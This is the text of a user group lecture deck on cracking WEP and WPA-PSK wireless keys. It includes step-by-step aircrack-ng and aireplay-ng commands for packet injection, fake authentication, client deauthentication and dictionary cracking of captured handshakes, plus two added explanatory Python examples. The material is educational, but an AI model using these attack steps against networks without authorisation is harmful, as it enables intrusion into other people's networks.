
Cracking Wireless

Ryan Curtin
LUG@GT

Ryan Curtin

Cracking Wireless - p. 1

Goals

By the end of this presentation (if you stay awake), you will:


- Understand the different types of wireless keys as well as their advantages and disadvantages
- Understand the legal ramifications of cracking wireless keys
- Have a basic idea of the theory behind the cracking of each key type
- Know how to use software to crack wireless keys


Setting Up

Most of the work can be done with the aircrack-ng package.

None of these attacks can be performed if you are using ndiswrapper for your network drivers, or other drivers that do not support promiscuous (or monitor) mode.

Starting / stopping promiscuous mode:
    airmon-ng stop wlan0
    airmon-ng check wlan0
    airmon-ng start wlan0 <channel>


Checking Injection

Before starting, make sure your card can inject packets into an AP!
    aireplay-ng -9 -e <ESSID> -a <MAC> wlan0



Make sure the percentage of ping replies is not incredibly small, otherwise it may be difficult to collect data.


WEP Encryption

The slide title is not redundant! WEP stands for wired equivalent privacy, not wireless encryption protocol.


- 64-bit or 128-bit keys
- Uses RC4 stream cipher with CRC-32 checksum
- Keys have 24-bit IV (initialization vector)
- 2^24 (16 million) possible IVs
- 50% probability of repeated IV after only 5000 packets
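The 24-bit IV figures above can be checked with the birthday problem. The following Python is an added example, not code from the slides: it computes the exact probability that a run of uniformly random 24-bit IVs contains a repeat, compares it with the closed-form birthday bound, and finds the packet count at which the probability first reaches 50%.

```python
import math

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS  # 16,777,216 distinct 24-bit IVs


def repeat_probability(packets: int, space: int = IV_SPACE) -> float:
    """Probability that at least two of `packets` independently chosen,
    uniformly random IVs are identical (the birthday problem).

    P(no repeat) = space! / ((space - packets)! * space^packets), evaluated
    in log space with lgamma so that large counts do not overflow."""
    if packets > space:
        return 1.0  # pigeonhole: more packets than IVs forces a repeat
    log_no_repeat = (math.lgamma(space + 1)
                     - math.lgamma(space - packets + 1)
                     - packets * math.log(space))
    return 1.0 - math.exp(log_no_repeat)


def birthday_bound(target: float, space: int = IV_SPACE) -> float:
    """Closed-form approximation of the packet count at which the repeat
    probability reaches `target`: n ~ sqrt(2 * space * ln(1 / (1 - target)))."""
    return math.sqrt(2.0 * space * math.log(1.0 / (1.0 - target)))


def packets_for_probability(target: float, space: int = IV_SPACE) -> int:
    """Smallest packet count whose exact repeat probability is >= `target`,
    found by binary search (repeat_probability is monotonic in `packets`)."""
    lo, hi = 1, space
    while lo < hi:
        mid = (lo + hi) // 2
        if repeat_probability(mid, space) >= target:
            hi = mid
        else:
            lo = mid + 1
    return lo


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE:,} values")
    print(f"P(repeat) after 5000 packets: {repeat_probability(5000):.3f}")
    print(f"Approximate 50% point: {birthday_bound(0.5):.0f} packets")
    print(f"Exact 50% point: {packets_for_probability(0.5)} packets")
```

Run as written, it shows that 5000 packets already give slightly better than even odds of a repeated IV, and that the 50% point sits just under 5000.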


Cracking WEP

Different methods have been developed:


- 2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a passive attack
- 2005: FBI demonstrates WEP cracking in three minutes
- 2006: Bittau, Handley, and Lackey show that active attacks are possible
- 2007: Pyshkin, Tews, and Weinmann optimize active attack (PTW attack)


Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel
    airodump-ng wlan0


2. Start capture of IVs
    airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0
   Leave this running! You want to capture around 50k IVs to ensure success (maybe more)
3. Fake authentication with AP
    aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0


Using aircrack-ng (2)



4. Reinject ARP packets to get more IVs
    aireplay-ng -3 -b <MAC> wlan0
   Run until you have a substantial number of IVs (in your airodump-ng process)


5. Crack the key!
   FMS attacks (slow): aircrack-ng -f 1 -F <capture>.cap
   PTW attacks (fast!): aircrack-ng -P 2 <capture>.cap


WPA Encryption

WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; 802.11i is WPA2.


- WPA: Wi-Fi Protected Access
- TKIP: Temporal Key Integrity Protocol


- TKIP also uses RC4 cipher (for legacy WEP hardware)
  Use AES instead if possible!
- IV length increased to 48 bits
- WPA-PSK (pre-shared key): common consumer environment setup


Cracking WPA-PSK

The WPA PSK initialization process is reproducible!


Therefore, we must capture a WPA handshake and then try to replicate it.
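"Reproducible" here means that the Pairwise Master Key is a fixed function of the passphrase and the SSID: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations and a 256-bit output, as specified in IEEE 802.11i. The Python below is an added example and not part of the slides; the passphrase and SSID values in it are constructed. It derives the PMK and shows that the same passphrase gives a different PMK under a different SSID, which is why precomputed tables of PMKs such as the rainbow tables on a later slide are only valid for the SSID they were built for, and why the entropy of the passphrase is the only thing standing between a captured handshake and the key.

```python
import hashlib

PBKDF2_ITERATIONS = 4096  # fixed by the WPA/WPA2-PSK specification
PMK_LENGTH = 32           # 256-bit Pairwise Master Key


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK Pairwise Master Key (IEEE 802.11i):
    PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    Deterministic: anyone holding the passphrase and SSID gets the same key,
    so a captured handshake can be checked against candidate passphrases offline."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS,
                               dklen=PMK_LENGTH)


def ssid_acts_as_salt(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs for two SSIDs.
    A precomputed table of PMKs is therefore tied to one SSID."""
    return wpa_pmk(passphrase, ssid_a) != wpa_pmk(passphrase, ssid_b)


if __name__ == "__main__":
    # Constructed sample values, chosen only for illustration.
    passphrase, ssid = "correct horse battery staple", "HomeNetwork"
    print("PMK for", repr(ssid), ":", wpa_pmk(passphrase, ssid).hex())
    print("Different SSID, different PMK:",
          ssid_acts_as_salt(passphrase, ssid, "linksys"))
```

The 4096 PBKDF2 iterations are the per-guess cost that makes a long random passphrase expensive to recover from a handshake; a short or dictionary passphrase gives that cost nothing to multiply.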


Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel; optional: ESSID of connected client
    airodump-ng wlan0


2. Start capture of handshakes
    airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0
   Leave this running! Watch for WPA handshake: xx:xx:xx:xx:xx:xx
3. (Optional) Fake deauthentication of client to trigger handshake
    aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0
   Watch for successful ACK in program output


4. Brute-force attack saved handshake
    aircrack-ng -w <dictionary> -b <MAC> <output capture>


Rainbow Tables

Rainbow Tables: a giant collection of potential common passphrases
Available from:
- Church of Wifi Rainbow Tables: http://www.renderlab.net/projects/WPA-tables/
- The Shmoo Group: http://rainbowtables.shmoo.com/
- Google Search: http://www.google.com/#q=wpa+rainbow+tables


Questions and Comments?

